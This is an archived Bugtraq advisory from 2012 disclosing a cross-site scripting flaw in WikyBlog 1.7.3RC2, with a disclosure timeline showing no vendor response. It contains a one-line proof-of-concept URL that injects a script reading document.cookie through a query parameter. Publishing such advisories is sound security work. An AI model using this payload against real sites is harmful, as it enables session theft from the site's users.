| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 15 Mar 2012 17:31:41 GMT From: sschurtz@...ksecurity.de To: bugtraq@...urityfocus.com Subject: WikyBlog 1.7.3RC2 XSS vulnerability Advisory: WikyBlog 1.7.3RC2 XSS vulnerability Advisory ID: SSCHADV2012-006 Author: Stefan Schurtz Affected Software: Successfully tested on WikyBlog 1.7.3RC2 Vendor URL: http://www.wikyblog.com/ Vendor Status: informed ========================== Vulnerability Description ========================== WikyBlog 1.7.3RC2 is prone to a XSS vulnerability ================== PoC-Exploit ================== http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='"<script>alert(document.cookie)</script> ========= Solution ========= - ==================== Disclosure Timeline ==================== 25-Feb-2012 - vendor informed 15-Mar-2012 - no response from vendor ======== Credits ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt
Powered by blists - more mailing lists